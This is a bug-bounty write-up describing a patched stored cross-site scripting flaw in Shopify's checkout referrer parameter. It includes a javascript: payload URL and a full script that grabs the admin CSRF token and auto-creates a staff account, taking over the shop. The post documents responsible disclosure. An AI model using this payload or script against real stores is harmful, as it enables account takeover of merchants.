To keep up with the security companies we often spend some time on bug bounties. That was a very boring weekend till we found out that Shopify had published their bbp on HackerOne. By the time I turned back and forth, all my teammates were plugged in. We found many cool vulnerabilities like privilege escalation, a few XSSs and an OAuth redirect bypass.

In this blog post I am going to show you how I used a persistent cross-site scripting vulnerability to take over shops. This vulnerability is easy to exploit: any customer/user of the shop can take it over.

When a customer purchases any product from a shop on Shopify, they are redirected to a checkout page. During that redirect, the request carries two additional parameters. One of them is an interesting parameter called referrer. It tracks where customers come from: for example, if there is a "buy now" button embedded on http://example.com and a customer clicks on it to buy a product, the referrer value is reflected in the admin panel of the shop, as shown in the screenshot below.

So to take over the shop, a customer simply has to purchase a product via this address with the referrer parameter set to a payload:

https://[victims-shopify-address].myshopify.com/cart/[product-id]:1?channel=buy_button&referer=javascript:alert(document.cookie);

Example:

https://madamcury.myshopify.com/cart/1188733065:1?channel=buy_button&referer=javascript:alert(document.cookie);

To make it more fun, we wrote some code that adds an admin on every click. This way one could take over a shop!

PS: After we reported this vulnerability, Shopify started using CSP as an extra measure to protect their customers from this kind of vulnerability. With CSP it isn't possible to execute inline script.


```javascript
// Fetch an admin page with the victim's session cookie to obtain the CSRF token
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://madamcury.myshopify.com/admin/orders", false);
xhr.withCredentials = true;
xhr.send(null);
var token = xhr.responseText;
// Cut the token out of the page at a fixed offset after the "csrf-param" meta tag
var pos = token.indexOf("csrf-param");
token = token.substring(pos).substr(30, 44);
alert(token);
// Write and auto-submit a form that creates a new staff account, with the token attached
document.write("<html><body><form action='https://madamcury.myshopify.com/admin/settings/account' method='POST'>" +
  "<input type='hidden' name='utf8' value='✓'>" +
  "<input type='hidden' name='authenticity_token' value='" + token + "'/>" +
  "<input type='hidden' name='user[first_name]' value='hacked' />" +
  "<input type='hidden' name='user[last_name]' value='hacked'>" +
  "<input type='hidden' name='user[email]' value='example+hacked@hotmail.com' />" +
  "<input type='hidden' name='_method' value='post'>" +
  "<input type='submit' value='Submit form'></form>" +
  "<script>document.forms[0].submit();</script></body></html>");
```


We reported this vulnerability to Shopify via HackerOne. This vulnerability is fixed now and cannot be reproduced.

Shopify rewarded us with a decent bounty, which made our next weekend really amazing.